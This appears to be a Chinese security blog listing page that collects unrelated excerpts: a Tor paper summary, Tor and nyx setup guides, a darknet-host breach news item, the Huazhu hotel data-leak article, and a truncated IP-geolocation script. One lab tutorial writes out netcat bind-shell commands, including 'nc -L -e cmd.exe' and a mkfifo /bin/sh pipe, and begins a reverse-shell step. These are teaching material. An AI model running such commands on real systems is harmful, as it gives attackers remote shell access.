信息安全

Tor: The Second-Generation Onion Router

Tor: The Second-Generation Onion Router 作者:R Dingledine ,N Mathewson ,P Syverson 出版源:《Journal of the Franklin Institute》 , 2004 一、Tor是什么Tor一种基于电路的低延迟匿名通信服务。第二代洋葱路由系统通过添加完美的前向匿名,拥塞控制,目录服务器,完整性检查,可配置的退出策略以及通过聚合点实现位置隐藏服务的实用设计来解决原始设计中的限制。 二、Tor设计目标 Babel、Mix-masterMixminion 较大和可变的延迟为代价实现匿名化 Anonymizer 易于分析,但用户必须信任匿名代理 Crowds 任何节点都可以读取用户的流量 Herbivore、P5 广播响应来隐藏发起者 Tor在匿名性,可用性和效率之间提供合理的权衡,实现通信的发起者与接受者被匿名保护。 在文中引导Tor演变目标: 可部署性、可用性、灵活性和设计简单。 补充:Tor网络工作原理 三、Tor设计 每个洋葱路由器都与每个其他洋葱路由器(OR)保持TLS 连接。每个用户运行称为洋葱代理(OP)的本地软件来获取目录,在网络上建立电路,以及处理来自用户应用程序的连接。这些OP接受TCP流并在电路中复用它们。电路另一侧的OR连接到请求的目的地并中继数据。 OR维护有两个key: (1)长期身份key (2)短期洋葱key Tor数据单元 中继单元 为了降低性能的开销,Tor在建立连接时使用RSA进行加密,而在传输数据的时候则使用速度较快的AES加密。 DH算法中gx为前半部分,gy为后半部分。 会话密钥k=gxgy。 Alice构建了一个两跳电路并开始获取网页。 中继数据: 链路已建立好,与链路上每个OR分享密钥。 OR接到relay后,查找此数据包对应链路,并用对应会话密钥解密中继头部和有效载荷。 若是从A发送过来的,OR检查该数据包摘要是否有效。若有效,接收并处理中继单元。OR找到circID和下一跳OR地址,发送解密后的数据包给下一跳OR。OR在解密过程中,还要对数据包进行填充。 电路拆除: A发送了destroy数据包,电路上每个OR收到后,关闭电路上的所有数据流,并发送一个新的destroy数据包给下一跳。同建立一条链路一样,链路的拆除也是逐步进行的。A若想改变电路,A会给链路中某个OR发送一个relay truncate数据包,OR收到后,向它的下一跳转发一个destroy命令数据包,并向A回复一个relay truncated数据包,这样后面的链路就会终止。 打开和关闭数据流:当某用户的应用程序想要与给定地址和端口建立TCP连接,会要求OP通过socks建立连接。OP选一新的(或根据需要创建一条)电路,然后在电路上选一个合适的OR作为出口节点。OP通过使用新的随机身份标识符将中继开始单元发送到出口节点来打开流。一旦出口节点连接到远程主机,它就会以中继连接的单元响应。OP收到后发送socks回复通知应用程序成功。OP接受来自应用程序TCP流的数据,将其打包到中继数据单元中,并将这些单元沿着电路发送到所选的OR。 数据流的完整性检验:旧的洋葱路由设计使用了流密码而没有进行完整性检查。 Tor仅在每条数据流的边缘进行完整性检查。(在我们的漏管电路拓扑中,流的边缘可能是电路中的任何跳)。 速率限制和公平:Tor服务器使用令牌桶方法来强制执行传入字节的长期平均速率,同时仍允许短期突发超过允许的带宽。 目前常用流量限制方法: (1)漏桶算法 (2)令牌桶算法 拥塞控制:(1)电路级限制 为了控制电路的带宽,每个OR跟踪两个窗口。 打包窗口 传送窗口 (2)流级别限制 OR和OP使用relay sendme单元来实现跨电路的各个流的端到端流控制。 四、集合点和位置隐藏服务 集合点是Tor网络中位置隐藏服务(也称为响应者匿名)的构建块。位置隐藏服务允许提供TCP服务,例如网络服务器,而不会泄露他的IP地址。 针对位置隐藏服务的设计具有以下目标: 访问控制、健壮性 、涂抹阻力(smear-resistance) 、应用程序透明度。

全球最大暗网托管网站被黑–6500个暗网服务

时间:2018年11月15- 10:06 PM 事件:全球最大的暗网托管网站被黑 后果:所有托管的暗网服务均被删除,由于架构原因,所有数据都已经丢失,且无法恢复 后续:恢复服务时间暂定为12月份 黑客利用手段:弱口令(phpmyadmin/adminer) WTF ,so easy的口令 参考链接:官网公告

【匿名通信】在Debian上安装运行tor和nyx并使用stem库

#1.安装运行tor apt-get install tor #2.安装python apt-get install python-pip #3.更新全部pip库,写一个更新脚本 vim pipupgrade.py import pip from subprocess import call for dist in pip.get_installed_distributions(): call("pip install --upgrade " + dist.project_name, shell=True) python pipupgrade.py #4.安装 stem和pymysql pip install stem pymysql #5.在目录/etc/tor下添加多用户base配置文件torrc.1 #如果只有单用户这步可以不要 vim /etc/tor/torrc.1 SocksPort 9060 ControlPort 9061 DataDirectory /var/lib/tor1 CookieAuthentication 1 #6.安装nyx apt-get update apt-get upgrade pip install nyx #7.运行nyx nyx #重启tor kill pidoftor /usr/bin/tor

华住数据泄露事件对你造成的影响?

最近,华住酒店集团用户信息泄露事件引发社会高度关注和热议,截图显示泄露的数据1.23亿条官网注册资料、1.3亿条入住登记身份信息以及2.4亿条详细开房记录,共140G资料 本次数据泄露波及华住集团旗下汉庭、美爵、禧玥、漫心、诺富特、美居、CitiGo、桔子、全季、星程、宜必思、怡莱、海友等多个酒店。 泄露信息包括客户的姓名、×××号、手机号、邮箱、家庭住址,开房信息(包括开房人员、开放时间、离开时间、房间号、消费金额等)经过对数据的简单测试,这些泄露信息的真实性是毋庸置疑的 1.泄露信息核对 2.精确到秒的开房信息 作为一个普通人,我们暂且不探究数据是怎么泄露的,假设我们是数据泄露名单中的一员,那这些信息会给我们带来怎样的影响呢? 1、广告电话、推销电话,对个人生活和工作造成干扰。 2、精准诈骗。诈骗分子收集用户信息,形成个人数据画像,再实施进一步的诱骗活动 3、被黑产产业利用。像薅羊毛和刷单产业,可以利用这些个人信息注册账号,对正常的互联网营销造成较大影响 4、被撞库,更多的信息面临被泄露的风险。很多用户可以说是‘一套密码走天下’,即在任何地方都使用同一套密码,这样的话就增加了撞库的风险,撞库指黑客通过收集互联网已泄露的用户和密码信息,生成对应的字典表,尝试批量登陆其他网站后,得到一系列信息登录的用户)的可能性。 不过,即便不幸出现了撞库,用户也不必过于恐慌。一些重要的互联网服务平台,比如微信、支付宝、淘宝等,单纯依靠账号密码并不能正常登录,还需要更多的验证信息,包括手机验证码、密保问题等。所以拿这些数据去撞库,得到的往往都是一些不太重要的服务。 公众企业对客户隐私信息的保护应该放在首位,做好安全管理工作,降低大批量数据泄露事件发生的可能性。而我们自己也应该建立起信息安全意识,定期更换密码、不使用弱口令密码、不同账号使用不同密码,来减少被暴力破解和撞库的可能性。

nyx(Tor的命令行监视器)的安装与使用

一.前景 为了对tor网络中继节点流量和带宽进行分析,使用tor官方的nyx工具. 运行环境:Ubuntu16.04 nyx主页,可能需要翻墙 二.安装 1.安装pip # 1. 更新系统包 sudo apt-get update sudo apt-get upgrade # 2. 安装Pip sudo apt-get install python-pip # 3. 检查 pip 是否安装成功 pip -V 2.安装nyx sudo pip install nyx ps:可能会出现如下问题 Command “python setup.py egg_info” failed with error code 1 in /tmp/pip-install-PF33Fn/nyx/ 解决办法: sudo python -m pip install --upgrade --force pip sudo pip install setuptools==33.1.1 三.使用 1.运行tor cd ~/tor/tor-0.3.3.9/src/or tor 2.修改配置文件torrc 运行tor后,不要Ctrl+C(会结束tor程序),要重开一个终端窗口; 分为两种情况修改torrc: 1.如果你安装tor浏览器: ~/tor/tor-browser_en-US/Browser/TorBrowser/Data/Tor vim torrc 2.

【匿名通信】在Linux(Ununtu 16.04)环境下编译运行tor源码

1.准备工作 (1)安装make工具 sudo apt-get install make (2)安装gcc sudo apt-get install build-essential (3)创建目录 mkdir tor-build cd tor-build 2.安装libevent sudo apt-get install libevent-dev 3.安装openssl sudo apt-get install libssl-dev 4.安装zlib sudo apt-get install zlib1g-dev 5.编译安装运行tor源码 (1)官网下载源码并且解压 wget http://www.theonionrouter.com/dist/tor-0.3.3.9.tar.gz tar zxvf tor-0.3.3.9.tar.gz cd tor-0.3.3.9 (2)运行配置文件 ./configure (3)编译、安装 make install (4)运行 cd ./src/or tor 运行结果: Jul 20 18:55:34.380 [notice] Tor 0.3.3.9 (git-45028085ea188baf) running on Linux with Libevent 2.0.21-stable, OpenSSL 1.0.2g, Zlib 1.2.8, Liblzma N/A, and Libzstd N/A.

后门与远控木马——Meterpreter初体验

后门与远控木马——msfvenom与Meterpreter初体验 实验环境 攻击机 kali 4.14(64位) (IP: 10.0.2.6/24) 靶机 ubuntu 16.04(32位) (IP: 10.0.2.4/24) windows 7 sp1(64位) (IP: 10.0.2.7/24) nc/ncat的使用 nc(全称是netcat)是一个用于TCP/UDP连接和监听的linux工具,有着网络工具中的“瑞士军刀”的美誉。nc的实现版本大致有两种,一种是带有-e或-c 选项可以直接给出执行命令,另一种不支持-e选项。 ncat是nmap项目的一部分,在安装nmap的时候会自动安装ncat。ncat号称“21世纪的netcat”,是对netcat的重新实现和升级,而且功能更加强大(如ssl加密、代理连接通过socks4 获取http) nc的监听模式在kali下会出现问题,监听的端口会发生变化,因此推荐同学们在kali下使用ncat。 nc后门获得win/linux shell 在win7靶机下载netcat后,进入netcat所在文件夹,在命令提示符中输入nc -L -e cmd.exe -p 80启动后门服务。 -L 选项或-l选项是将nc设置为监听模式。-p 选项指定监听的端口(混淆为80,53等端口往往能穿透防火墙),-e 选项可以绑定到cmd.exe这个shell程序。 在攻击机中输入nc 10.0.2.7 80连接到win7靶机,获得win7的shell。 ubuntu自带的nc版本没有-e 选项,当然可以用ncat替代,这里展示一下没有-e 选项的nc如何获得shell。(参考man手册) 输入 $ rm -f /tmp/f; mkfifo /tmp/f $ cat /tmp/f | /bin/sh -i 2>&1 | nc -l 1234 > /tmp/f 攻击机连接后,得到shell nc获得win/linux反弹shell 前面的示例都是靶机作为服务器,监听攻击机的TCP连接。下面我们让靶机主动连接攻击机,获得反弹式shell。 在攻击机中输入ncat -vv -l 9190进入监听模式,-vv选项提供详细的状态输出。 靶机中输入nc 10.

kali下ONIOFF,暗网链接可用性检测

参考: https://www.youtube.com/watch?v=lPBYH5hiojY https://github.com/k4m4/onioff cd /tmp git clone https://github.com/k4m4/onioff cd onioff sudo pip install -r requirements.txt python onioff.py -h service tor start python onioff.py -f onion.txt -o output.txt #自动检测onion里面的暗网链接是否正常,然后把结果输出到output里面 onion.txt

kali下一个虚假的tor访问方案

1、并没有真的安装tor浏览器,但是却使用了tor的服务、 2、项目地址:https://github.com/susmithHCK/torghost 3、使用说明,可以直接在项目地址查看使用说明。 通过tor官方的检查,识别你使用了tor服务,其实你用的是自己的浏览器,只是开了一个代理。

追踪电脑或手机(已知目标IP或mac)进行物理定位

仅供学习娱乐测试。 iplocator.pl代码: #!/usr/bin/perl # Ip Geolocation #By Alexcerus # Demo : https://www.youtube.com/watch?v=0Eq3d10LQ8c # # API documentation - http://ip-api.com/docs/ # you can see you external ip using this Bash script : # read COUNTRY IP <<< $(wget -qO- http://ip-api.com/line/?fields=countryCode,query); echo $IP $COUNTRY # Now let's start : use Socket; use Term::ANSIColor; use WWW::Mechanize; use JSON; print color 'bold bright_yellow'; print q{ ~o88ooooooooooooo88o~ ouooooo,~oo oo~,ooooouo 8 ~88888. ,88888~ 8 8 go~~~os go~~~os 8 8 ,8` '8_8` '8.